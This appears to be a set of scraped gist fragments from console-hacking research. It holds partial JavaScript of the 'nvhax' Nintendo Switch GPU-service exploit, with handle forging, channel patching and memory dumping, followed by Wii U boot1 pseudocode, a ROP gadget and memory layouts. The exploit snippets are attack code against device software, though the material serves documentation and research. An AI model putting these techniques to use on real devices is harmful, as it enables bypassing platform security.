This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
nvhax exploit | |
*/ | |
// Global nvservices exploit context | |
sploitcore.prototype.nvdrv_exp_ctx = {}; | |
sploitcore.prototype.spawn_nvdrv_srv = function(sm_handle, transf_mem_addr, transf_mem_size) { | |
// Forge a new service handle for NVDRV | |
var srv_handle = this.forge_handle(sm_handle, "nvdrv:t"); | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_find_channel = function(hw_num) { | |
var mem_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40000); | |
var page_info_addr = utils.add2(this.nvdrv_exp_ctx[6], 0x40100); | |
var test_addr = [0, 0]; | |
var ch_base_addr = [0, 0]; | |
// Look for user channel | |
while (test_addr[1] < 0x80) | |
{ | |
var result = this.nvhax_svc(0x06, [mem_info_addr, page_info_addr, test_addr], [], false); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_patch_channel = function(ch_base_addr, target_paddr) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Page directory is always at channel + 0x15000 | |
var pdb_vaddr = utils.add2(ch_base_addr, 0x15000); | |
// Read page directory base IOVA | |
var pdb_iova_lo = this.nvhax_read32(utils.add2(ch_base_addr, 0x200)); | |
var pdb_iova_hi = this.nvhax_read32(utils.add2(ch_base_addr, 0x204)); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
sploitcore.prototype.nvhax_peephole_dump_mem = function(ch_iova, gpu_va, mem_size) { | |
// Map GPU MMIO | |
var gpu_io_vaddr = this.nvhax_map_io(0x57000000, 0x01000000); | |
// Write the channel's iova in PEEPHOLE PBUS register | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x1718), (0x80000000 | ch_iova)); | |
// Write the GPU virtual address in PEEPHOLE registers | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x6000C), gpu_va[1]); | |
this.nvhax_write32(utils.add2(gpu_io_vaddr, 0x60010), gpu_va[0]); |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Do some boring stuff | |
... | |
// Decrypt PRSH/PRST with Starbuck ancast key | |
sub_D400320(0x10000400, 0x7C00, iv); | |
// Parse PRSH/PRST | |
sub_D40B030(0x10000400, 0x7C00); | |
// Locate or create new "boot_info" |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0D40AC6C 20 00 BC 0E 46 93 46 9D 47 08 00 00 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0D40AC6C MOVS R0, #0 | |
0D40AC6E POP {R1-R3} | |
0D40AC70 MOV R11, R2 | |
0D40AC72 MOV SP, R3 | |
0D40AC74 BX R1 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0x00000000: 0x00000001 // Always 1 (set by boot1 on coldboot) | |
0x00000004: 0xA6000000 // Boot flags (0x80 means data is set) | |
0x00000008: 0x00000000 // Boot state | |
0x0000000C: 0x00000001 // Boot count (increased by boot1 on reset) | |
0x00000010: 0x00100000 // Set to 0 by boot1 on coldboot | |
0x00000014: 0x00000000 // Set to 0 by boot1 on coldboot | |
0x00000018: 0xFFFFFFFF // Set to -1 by boot1 on coldboot | |
0x0000001C: 0xFFFFFFFF // Set to -1 by boot1 on coldboot | |
0x00000020: 0xFFFFFFFF // Set to -1 by boot1 on coldboot | |
0x00000024: 0xFFFFFFFF // Set to -1 by boot1 on coldboot |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Name: "boot_info" | |
Address: 0x10008000 | |
Size: 0x00000058 | |
UNK: 0x80000000 | |
Name: "mcp_crash_region" | |
Address: 0x100F7F60 | |
Size: 0x000080A0 | |
UNK: 0x80000000 | |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
0x10000000: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0 | |
... | |
0x100003F0: 12 34 56 78 9A BC DE F0 12 34 56 78 9A BC DE F0 | |
0x10000400: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |
... | |
0x10005A40: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 | |
0x10005A50: 00 00 00 00 | |
0x10005A54: PRSH XOR checksum | |
0x10005A58: "PRSH" // magic | |
0x10005A5C: 0x00000001 // version (0 or 1) |